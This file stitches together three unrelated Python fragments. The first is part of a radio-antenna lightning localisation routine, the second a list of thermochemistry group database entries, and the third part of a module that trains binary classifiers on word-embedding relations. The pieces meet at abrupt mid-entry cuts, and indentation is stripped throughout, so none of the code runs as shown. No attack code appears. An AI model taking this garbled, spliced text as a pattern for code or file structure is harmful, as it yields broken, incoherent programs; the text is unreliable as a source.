converg_rad=self.stage_1_converg_radius, max_itters=self.stage_1_max_itters)
stage_1_result.x[2] = np.abs(stage_1_result.x[2]) ## ensure Z is positive
log_func(" stoch. itters:", num_itter, num_stage1_itters, '{:4.2f}'.format(-stage_1_result.fun) )
log_func(" loc: {:d} {:d} {:d}".format(int(stage_1_result.x[0]), int(stage_1_result.x[1]), int(stage_1_result.x[2])) )
## select data for stage 2 ##
previous_solution = stage_1_result
converged = False
problem = False
for stage2loop_i in range(self.stage_2_max_itters):
in_X = self.bounding_box[0,0] < previous_solution.x[0] < self.bounding_box[0,1]
in_Y = self.bounding_box[1,0] < previous_solution.x[1] < self.bounding_box[1,1]
in_Z = self.bounding_box[2,0] < previous_solution.x[2] < self.bounding_box[2,1]
if (not in_X) or (not in_Y) or (not in_Z):
log_func("WARNING: point", previous_solution.x, "not in bounding box. Skipping.")
problem = True
else:
s2_ant_i = -1
for ant_i in range( self.num_antennas ):
if self.use_core_stations_S2 or self.is_not_core[ant_i]:
s2_ant_i += 1 ## increment here, rather than at the end, because of the break below
modeled_dt = -( np.linalg.norm( self.antenna_locations[ prefered_ant_i ]-previous_solution.x ) -
np.linalg.norm( self.antenna_locations[ant_i]-previous_solution.x ) )/v_air
modeled_dt -= self.antenna_delays[ prefered_ant_i ] - self.antenna_delays[ant_i]
modeled_dt /= 5.0E-9
modeled_dt += peak_loc
modeled_dt = int(modeled_dt)
if modeled_dt+int(self.pulse_length/2) >= len(self.data_block[ant_i]):
log_func("unknown problem. LOC at", previous_solution.x)
problem = True
break
self.stage_2_imager.set_data( self.data_block[ant_i, modeled_dt-int(self.pulse_length/2):modeled_dt+int(self.pulse_length/2)]*self.stage_2_window, s2_ant_i, -modeled_dt*5.0E-9 )
if problem:
self.hilbert_envelope_tmp[peak_loc-int(self.pulse_length/2):peak_loc+int(self.pulse_length/2)] = 0.0
break
## fft and xcorrelation ##
self.stage_2_imager.prepare_image( self.min_pulse_amplitude )
#
BB = np.array( [ [previous_solution.x[0]-50, previous_solution.x[0]+50], [previous_solution.x[1]-50, previous_solution.x[1]+50], [previous_solution.x[2]-50, previous_solution.x[2]+50] ] )
stage_2_result, s2_itternum, num_stage2_itters = stochastic_minimizer(self.stage_2_imager.intensity_ABSbefore , BB, converg_num=5, test_spot=previous_solution.x,
converg_rad=self.stage_2_convergence_length, max_itters=self.stage_2_max_stoch_itters, options={'maxiter':1000})
stage_2_result.x[2] = np.abs(stage_2_result.x[2]) ## ensure Z is positive
D = np.linalg.norm( stage_2_result.x - previous_solution.x )
log_func(" s2 itter: {:2d} {:4.4f} {:d}".format(stage2loop_i, -stage_2_result.fun, int(D)) )
if D < self.stage_2_convergence_length:
converged = True
break
elif D > self.stage_2_break_length:
converged = False
break
previous_solution = stage_2_result
if problem:
continue
new_stage_1_result = minimize(self.stage_1_imager.intensity, stage_2_result.x, method="Nelder-Mead", options={'maxiter':1000})
log_func(" old S1: {:4.2f} new SH1: {:4.2f}".format(-stage_1_result.fun, -new_stage_1_result.fun) )
if stage_1_result.fun < new_stage_1_result.fun:
S1_S2_distance = np.linalg.norm(stage_1_result.x-stage_2_result.x)
else:
S1_S2_distance = np.linalg.norm(new_stage_1_result.x-stage_2_result.x)
log_func(" loc: {:d} {:d} {:d}".format(int(stage_2_result.x[0]), int(stage_2_result.x[1]), int(stage_2_result.x[2])) )
log_func(" S1-S2 distance: {:d} converged: {} ".format( int(S1_S2_distance), converged) )
log_func(" intensity: {:4.3f} amplitude: {:d} ".format( -stage_2_result.fun, int(self.hilbert_envelope_tmp[peak_loc])) )
log_func()
log_func()
## save to file ##
source_dataset = h5_groupobject.create_dataset(str(event_i), (self.num_antennas,self.pulse_length), dtype=np.complex128)
source_dataset.attrs["loc"] = stage_2_result.x
source_dataset.attrs["unique_index"] = block_index*self.max_events_perBlock + event_i
source_time_s2 = (peak_loc+start_index+self.antenna_data_offsets[prefered_ant_i])*5.0E-9 - np.linalg.norm( stage_2_result.x - self.antenna_locations[ prefered_ant_i ] )/v_air
source_time_s2 -= self.prefered_station_timing_offset + self.prefered_station_antenna_timing_offsets[ self.antennas_to_use[prefered_ant_i][1] ]
source_dataset.attrs["T"] = source_time_s2
source_dataset.attrs["peak_index"] = peak_loc
source_dataset.attrs["intensity"] = -stage_2_result.fun
source_dataset.attrs["stage_1_success"] = (num_stage1_itters==self.stage_1_converg_num)
source_dataset.attrs["stage_1_num_itters"] = num_stage1_itters
source_dataset.attrs["amplitude"] = self.hilbert_envelope_tmp[peak_loc]
source_dataset.attrs["S1_S2_distance"] = S1_S2_distance
source_dataset.attrs["converged"] = converged
source_time_s1 = (peak_loc+start_index+self.antenna_data_offsets[prefered_ant_i])*5.0E-9 - np.linalg.norm( stage_1_result.x - self.antenna_locations[ prefered_ant_i ] )/v_air
source_time_s1 -= self.prefered_station_timing_offset + self.prefered_station_antenna_timing_offsets[ self.antennas_to_use[prefered_ant_i][1] ]
source_dataset.attrs["XYZT_s1"] = np.append(stage_1_result.x, [source_time_s1])
#### erase the peaks !! ####
# self.hilbert_envelope_tmp[peak_loc-int(self.pulse_length/2):peak_loc+int(self.pulse_length/2)] *= self.erasure_window
self.hilbert_envelope_tmp[peak_loc-int(self.pulse_length/2):peak_loc+int(self.pulse_length/2)] = 0.0
for ant_i in range( self.num_antennas ):
modeled_dt = -( np.linalg.norm( self.antenna_locations[ prefered_ant_i ]-stage_2_result.x ) -
np.linalg.norm( self.antenna_locations[ant_i]-stage_2_result.x ) )/v_air
modeled_dt -= self.antenna_delays[ prefered_ant_i ] - self.antenna_delays[ant_i]
modeled_dt /= 5.0E-9
modeled_dt += peak_loc
modeled_dt = int(modeled_dt)
source_dataset[ant_i] = self.data_block[ant_i, modeled_dt-int(self.pulse_length/2):modeled_dt+int(self.pulse_length/2)]
if converged and self.erase_pulses:
self.data_block[ant_i, modeled_dt-int(self.pulse_length/2):modeled_dt+int(self.pulse_length/2)] *= self.erasure_window
def run_multiple_blocks(self, output_folder, initial_datapoint, start_block, blocks_per_run, run_number, skip_blocks_done=True, print_to_screen=True):
processed_data_folder = processed_data_dir(self.timeID)
data_dir = processed_data_folder + "/" + output_folder
if not isdir(data_dir):
mkdir(data_dir)
logging_folder = data_dir + '/logs_and_plots'
if not isdir(logging_folder):
mkdir(logging_folder)
file_number = 0
while True:
fname = logging_folder + "/log_run_"+str(file_number)+".txt"
if isfile(fname) :
file_number += 1
else:
break
logger_function = logger()
logger_function.set( fname, print_to_screen )
logger_function.take_stdout()
logger_function.take_stderr()
#### TODO: improve logging of all the options ####
logger_function("timeID:", self.timeID)
logger_function("date and time run:", time.strftime("%c") )
Cd u0 {1,S} {7,D}
5 Cs u0 {1,S}
6 Cdd u0 {3,D}
7 Cdd u0 {4,D}
8 O2d u0 {2,D}
""",
thermo = u'Cs-(Cds-O2d)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
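# Note on the adjacency-list notation above (added comment, following standard
# RMG-Py conventions): each row reads "index [*] atomtype u<n> {neighbor,bond}";
# '*' marks the central atom of the group, u0 means zero unpaired electrons,
# S/D are single/double bonds, and atom types such as Cdd or O2d denote a carbon
# with two double bonds or a double-bonded oxygen, respectively.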
entry(
index = 576,
label = "Cs-(Cds-O2d)(Cds-Cdd-O2d)(Cds-Cdd-O2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 CO u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 O2d u0 {4,D}
9 O2d u0 {5,D}
10 O2d u0 {6,D}
""",
thermo = u'Cs-(Cds-Cdd-O2d)(Cds-Cdd-O2d)CsCs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 577,
label = "Cs-(Cds-O2d)(Cds-Cdd-O2d)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 CO u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 O2d u0 {4,D}
9 O2d u0 {5,D}
10 C u0 {6,D}
""",
thermo = u'Cs-(Cds-O2d)(Cds-Cdd-O2d)(Cds-Cds)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 578,
label = "Cs-(Cds-O2d)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 CO u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 O2d u0 {4,D}
9 C u0 {5,D}
10 C u0 {6,D}
""",
thermo = u'Cs-(Cds-O2d)(Cds-Cds)(Cds-Cds)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 579,
label = "Cs-(Cds-Cd)(Cds-Cd)(Cds-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {5,S}
2 Cd u0 {1,S} {6,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cs u0 {1,S}
6 C u0 {2,D}
7 C u0 {3,D}
8 C u0 {4,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cds)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 580,
label = "Cs-(Cds-Cds)(Cds-Cds)(Cds-Cds)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {5,S}
2 Cd u0 {1,S} {6,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cs u0 {1,S}
6 Cd u0 {2,D}
7 Cd u0 {3,D}
8 Cd u0 {4,D}
""",
thermo = ThermoData(
Tdata = ([300,400,500,600,800,1000,1500],'K'),
Cpdata = ([3.32,5.86,7.57,8.54,9.22,9.36,8.45],'cal/(mol*K)','+|-',[0.13,0.13,0.13,0.13,0.13,0.13,0.13]),
H298 = (2.54,'kcal/mol','+|-',0.26),
S298 = (-33.96,'cal/(mol*K)','+|-',0.13),
),
shortDesc = u"""Cs-CdCdCdCs BOZZELLI = Cs/Cs2/Cd2 + (Cs/Cs3/Cd - Cs/Cs4)""",
longDesc =
u"""
""",
)
entry(
index = 581,
label = "Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {5,S}
2 Cd u0 {1,S} {6,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cs u0 {1,S}
6 Cd u0 {2,D}
7 Cd u0 {3,D}
8 Cdd u0 {4,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd-Cd)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 582,
label = "Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd-O2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {6,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cs u0 {1,S}
7 Cd u0 {3,D}
8 Cd u0 {4,D}
9 O2d u0 {5,D}
""",
thermo = u'Cs-(Cds-Cdd-O2d)CsCsCs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = -1,
label = "Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd-S2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {6,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cs u0 {1,S}
7 Cd u0 {3,D}
8 Cd u0 {4,D}
9 S2d u0 {5,D}
""",
thermo = None,
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 583,
label = "Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {6,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cs u0 {1,S}
7 Cd u0 {3,D}
8 Cd u0 {4,D}
9 C u0 {5,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cds)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 584,
label = "Cs-(Cds-Cds)(Cds-Cdd)(Cds-Cdd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {5,S}
2 Cd u0 {1,S} {6,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cs u0 {1,S}
6 Cd u0 {2,D}
7 Cdd u0 {3,D}
8 Cdd u0 {4,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 585,
label = "Cs-(Cds-Cds)(Cds-Cdd-O2d)(Cds-Cdd-O2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 Cd u0 {4,D}
9 O2d u0 {5,D}
10 O2d u0 {6,D}
""",
thermo = u'Cs-(Cds-Cdd-O2d)(Cds-Cdd-O2d)CsCs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 586,
label = "Cs-(Cds-Cds)(Cds-Cdd-O2d)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 Cd u0 {4,D}
9 O2d u0 {5,D}
10 C u0 {6,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd-O2d)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = -1,
label = "Cs-(Cds-Cds)(Cds-Cdd-S2d)(Cds-Cdd-S2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 Cd u0 {4,D}
9 S2d u0 {5,D}
10 S2d u0 {6,D}
""",
thermo = None,
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = -1,
label = "Cs-(Cds-Cds)(Cds-Cdd-S2d)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 Cd u0 {4,D}
9 S2d u0 {5,D}
10 C u0 {6,D}
""",
thermo = None,
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 587,
label = "Cs-(Cds-Cds)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {7,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {8,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cs u0 {1,S}
8 Cd u0 {4,D}
9 C u0 {5,D}
10 C u0 {6,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cds)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 588,
label = "Cs-(Cds-Cdd)(Cds-Cdd)(Cds-Cdd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {5,S}
2 Cd u0 {1,S} {6,D}
3 Cd u0 {1,S} {7,D}
4 Cd u0 {1,S} {8,D}
5 Cs u0 {1,S}
6 Cdd u0 {2,D}
7 Cdd u0 {3,D}
8 Cdd u0 {4,D}
""",
thermo = u'Cs-(Cds-Cdd-Cd)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 589,
label = "Cs-(Cds-Cdd-O2d)(Cds-Cdd-O2d)(Cds-Cdd-O2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {8,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {7,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cdd u0 {4,D} {11,D}
8 Cs u0 {1,S}
9 O2d u0 {5,D}
10 O2d u0 {6,D}
11 O2d u0 {7,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 590,
label = "Cs-(Cds-Cdd-O2d)(Cds-Cdd-O2d)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {8,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {7,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cdd u0 {4,D} {11,D}
8 Cs u0 {1,S}
9 O2d u0 {5,D}
10 O2d u0 {6,D}
11 C u0 {7,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cdd-O2d)(Cds-Cdd-O2d)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 591,
label = "Cs-(Cds-Cdd-O2d)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {8,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {7,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cdd u0 {4,D} {11,D}
8 Cs u0 {1,S}
9 O2d u0 {5,D}
10 C u0 {6,D}
11 C u0 {7,D}
""",
thermo = u'Cs-(Cds-Cds)(Cds-Cds)(Cds-Cdd-O2d)Cs',
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = -1,
label = "Cs-(Cds-Cdd-S2d)(Cds-Cdd-S2d)(Cds-Cdd-S2d)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {8,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {7,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cdd u0 {4,D} {11,D}
8 Cs u0 {1,S}
9 S2d u0 {5,D}
10 S2d u0 {6,D}
11 S2d u0 {7,D}
""",
thermo = None,
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = -1,
label = "Cs-(Cds-Cdd-S2d)(Cds-Cdd-S2d)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {8,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {7,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cdd u0 {4,D} {11,D}
8 Cs u0 {1,S}
9 S2d u0 {5,D}
10 S2d u0 {6,D}
11 C u0 {7,D}
""",
thermo = None,
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = -1,
label = "Cs-(Cds-Cdd-S2d)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs",
group =
"""
1 * Cs u0 {2,S} {3,S} {4,S} {8,S}
2 Cd u0 {1,S} {5,D}
3 Cd u0 {1,S} {6,D}
4 Cd u0 {1,S} {7,D}
5 Cdd u0 {2,D} {9,D}
6 Cdd u0 {3,D} {10,D}
7 Cdd u0 {4,D} {11,D}
8 Cs u0 {1,S}
9 S2d u0 {5,D}
10 C u0 {6,D}
11 C u0 {7,D}
""",
thermo = None,
shortDesc = u"""""",
longDesc =
u"""
""",
)
entry(
index = 592,
label = "Cs-(Cds-Cdd-Cd)(Cds-Cdd-Cd)(Cds-Cdd-Cd)Cs",
group =
"""
1
import torch
import embrelassess.model as biclassmodel
import embrelassess.train as train
import sys
import logging
import os
import os.path as osp
import json
import math
import itertools
import pandas as pd
logger = logging.getLogger(__name__)
# The learn module provides methods for learning binary classifiers
# as well as for providing IO on the training and testing of the models
def _epochs_from_trainset_size(trainset_size):
"""Returns a sensible number of epochs for a given trainset_size
Args:
trainset_size the size of the training set (i.e. examples in 1 epoch)
Returns:
integer number of suggested epochs to train for
"""
log10 = math.log10(trainset_size/2)
order = round(log10 - 1)
inv_order = 5 - order
factor = math.pow(2, inv_order)
base = 3
return round(factor * base)
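# Worked example of the heuristic above (added; values are illustrative):
#   trainset_size = 20000 -> log10(10000) = 4 -> order = 3 -> inv_order = 2
#   factor = 2**2 = 4, so epochs = round(4 * 3) = 12.
# Smaller datasets get more epochs:
#   trainset_size = 200 -> log10(100) = 2 -> order = 1 -> factor = 16 -> 48 epochs.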
def _build_model(name='nn3', indim=600):
"""Build a pytorch binary classifier for a given input dimension
Args:
name one of 'nn1', 'nn2', 'nn3', 'logreg', 'alwaysT', 'alwaysF'
Returns:
a pytorch binary classifier model
"""
# TODO: move to embrelassess.model?
if name == 'logreg':
my_model = biclassmodel.LogisticRegression(indim)
elif name == 'nn1':
nn1 = {"layer_dims": [indim], "dropouts": [0.5]}
my_model = biclassmodel.NNBiClassifier(indim, nn1['layer_dims'],
nn1['dropouts'])
elif name == 'nn2':
if indim == 600:
nn2 = {"layer_dims": [750, 400], "dropouts": [0.5, 0.5]}
elif indim == 512:
nn2 = {"layer_dims": [700, 375], "dropouts": [0.5, 0.5]}
elif indim == 320:
nn2 = {"layer_dims": [440, 160], "dropouts": [0.5, 0.5]}
elif indim == 300:
nn2 = {"layer_dims": [400, 150], "dropouts": [0.5, 0.5]}
elif indim == 256:
nn2 = {"layer_dims": [350, 150], "dropouts": [0.5, 0.5]}
elif indim == 160:
nn2 = {"layer_dims": [220, 85], "dropouts": [0.5, 0.5]}
elif indim == 150:
nn2 = {"layer_dims": [200, 80], "dropouts": [0.5, 0.5]}
elif indim == 128:
nn2 = {"layer_dims": [175, 75], "dropouts": [0.5, 0.5]}
else:
raise Exception('Unexpected input dimension %d' % indim)
my_model = biclassmodel.NNBiClassifier(indim, nn2['layer_dims'],
nn2['dropouts'])
elif name == 'nn3':
if indim == 600:
nn3 = {"layer_dims": [750, 500, 250],
"dropouts": [0.5, 0.5, 0.5]}
elif indim == 512:
nn3 = {"layer_dims": [700, 475, 225],
"dropouts": [0.5, 0.5, 0.5]}
elif indim == 320:
nn3 = {"layer_dims": [440, 220, 110],
"dropouts": [0.5, 0.5, 0.5]}
elif indim == 300:
nn3 = {"layer_dims": [400, 200, 100],
"dropouts": [0.5, 0.5, 0.5]}
elif indim == 256:
nn3 = {"layer_dims": [350, 200, 100], "dropouts": [0.5, 0.5, 0.5]}
elif indim == 160:
nn3 = {"layer_dims": [220, 110, 80], "dropouts": [0.5, 0.5, 0.5]}
elif indim == 150:
nn3 = {"layer_dims": [200, 100, 75], "dropouts": [0.5, 0.5, 0.5]}
elif indim == 128:
nn3 = {"layer_dims": [175, 100, 50], "dropouts": [0.5, 0.5, 0.5]}
else:
raise Exception('Unexpected input dimension %d' % indim)
my_model = biclassmodel.NNBiClassifier(indim, nn3['layer_dims'],
nn3['dropouts'])
elif name == 'alwaysT':
my_model = biclassmodel.DummyBiClassifier(indim, predef=[0.01, 0.99])
elif name == 'alwaysF':
my_model = biclassmodel.DummyBiClassifier(indim, predef=[0.99, 0.01])
else:
raise Exception('Unknown model name %s' % name)
return my_model
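# Illustrative usage (added; follows the dimension table above):
#   model = _build_model('nn3', indim=300)
# builds a feed-forward binary classifier with hidden layers 400 -> 200 -> 100
# and dropout 0.5 on each, per the nn3 configuration for 300-d inputs.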
def load_rels_meta(relpath):
"""Extracts metadata about a folder with relpair files based on the filenames
Args:
relpath the path to the folder containing the word relation data, files in
this folder must adhere to the standard naming reltype_relname__excnt.txt
Returns:
dataframe with columns 'type', 'name', 'cnt' and 'file'
"""
rels = []
for f in [f for f in os.listdir(relpath) if osp.isfile(osp.join(relpath, f))]:
prefix_end = f.find('_')
rel_end = f.find('__')
ext_start = f.find('.txt')
if ext_start < 0 or rel_end < 0 or prefix_end < 0:
continue
rel_type = f[0:prefix_end]
rel_name = f[prefix_end + 1:rel_end]
if len(rel_name) == 0:
rel_name = 'rel'
rel_ex_cnt = int(f[rel_end + 2:ext_start])
rel = {"type": rel_type, "name": rel_name, "cnt": rel_ex_cnt, "file": f}
rels.append(rel)
# print(rel)
rel_df = pd.DataFrame(rels)
return rel_df
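# Worked example (added): a file named 'hyper_hypernym__1500.txt' parses to
#   type='hyper', name='hypernym', cnt=1500
# while 'syn__800.txt' has an empty name segment, so name falls back to 'rel'.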
def pair_disturber(input_batch):
bsize = input_batch.size()
assert bsize[1] % 2 == 0
distortions = torch.randn(bsize[0], int(bsize[1]/2))
distortions = torch.cat((distortions, distortions), dim=1)
return input_batch + distortions
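# Demo (added sketch) of the key property of pair_disturber: both halves of a
# concatenated pair embedding receive the same noise, so the within-pair offset
# is preserved while the absolute position of the pair is perturbed.
def _demo_pair_disturber():
    batch = torch.randn(4, 600)  # e.g. four pairs of 300-d word vectors
    noisy = pair_disturber(batch)
    # the difference between the two halves is unchanged by the distortion
    assert torch.allclose(noisy[:, :300] - noisy[:, 300:],
                          batch[:, :300] - batch[:, 300:], atol=1e-6)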
def pair_disturber_for_vectors(vectors):
return pair_disturber_std(vectors.std())
def pair_disturber_std(std):
def _pair_disturber(input_batch):
bsize = input_batch.size()
assert bsize[1] % 2 == 0
distortions = torch.randn(bsize[0], int(bsize[1]/2))
distortions = distortions * std
distortions = torch.cat((distortions, distortions), dim=1)
return input_batch + distortions
return _pair_disturber
def learn_rels(relpath, rels_meta_df, data_loaders,
single_rel_types=[],
epochs_from_trainset_size_fn=_epochs_from_trainset_size,
rel_filter=None, models=['logreg', 'nn2', 'nn3'], n_runs=5,
train_input_disturber_for_vec=None,
debug_test_df=False,
odir_path=None,
cuda=False):
"""Trains binary classifier models to learn multiple relations
Args:
rels_meta_df a dataframe of relation metadata for all the relations for which
you want to learn models
other arguments: see learn_rel
Returns:
a list of learning result objects. See method learn_rel for a description
such an object.
"""
learn_results = []
tot = len(rels_meta_df)
for i, rel_meta in rels_meta_df.iterrows():
print("\n*** rel %d of %d ***\n" % (i, tot))
learn_results.append(
learn_rel(relpath, rel_meta,
data_loaders,
single_rel_types=single_rel_types,
epochs_from_trainset_size_fn=epochs_from_trainset_size_fn,
rel_filter=rel_filter, models=models, n_runs=n_runs,
train_input_disturber_for_vec=train_input_disturber_for_vec,
odir_path=odir_path,
cuda=cuda))
return learn_results
def learn_rel(relpath, rel_meta, data_loaders,
single_rel_types=[],
epochs_from_trainset_size_fn=_epochs_from_trainset_size,
epoch_list_from_epochs=lambda x: range(x),
rel_filter=None, models=['logreg', 'nn2', 'nn3'], n_runs=5,
train_input_disturber_for_vec=None,
debug_test_df=False,
odir_path=None,
cuda=False):
""" Train binary classifier models to learn a relation given a dataset
Args:
relpath path to the relation tsv files
rel_meta dict or object with metadata about the relation to learn
data_loaders dictionary of data_loader objects responsible for loading
and splitting the dataset
single_rel_types list of rel type names which are not pairs, but
single words
epochs_from_trainset_size_fn function from trainset size to number
of epochs
epoch_list_from_epochs function from an int (the number of epochs) to
a list of epochs. By default, this is simply range(x),
but you may replace it with a tqdm to keep track of training progress.
rel_filter filter for the rel_meta to skip unwanted relations
models list of model names to train
n_runs times to train each model (to get average and stdv)
train_input_disturber_for_vec factory that, given the embedding vectors, returns a function to disturb an input batch
odir_path optional path to a folder where the trained model should be stored
Returns:
An object with data summarising the learning result. It includes the
rel_name, rel_type, number of epochs trained, number of positive samples
for the relation and metrics for various models: base, best, and the
specified models. Metrics include (average and stdv for) accuracy, f1,
precision and recall.
"""
cnt = rel_meta['cnt']
rel_name = rel_meta['name']
rel_type = rel_meta['type']
empty_result = {"rel_name": rel_name, "rel_type": rel_type,
"pos_exs": cnt,
"emb_model_results": {}}
if cnt < 75:
print(rel_name, rel_type, 'too few examples')
return empty_result
if rel_filter and not rel_filter(rel_meta):
print(rel_name, rel_type, 'not in rel_name filter')
return empty_result
emb_model_results = {} # dict from 'emb name' to a list of model_results
print('Training each model %d times...' % n_runs)
for model, loader_name, run in itertools.product(
models, data_loaders, range(n_runs)):
print("run %d on model %s with vectors %s" %
(run, model, loader_name))
data_loader = data_loaders[loader_name]
fpath = osp.join(relpath, rel_meta['file'])
# load embeddings and labels
if rel_type == 'rnd2rnd':
X, Y, ds_n, ds_tc, ds_tf = data_loader.generate_random_pair_data(
target_size=cnt*2)
elif rel_type in single_rel_types:
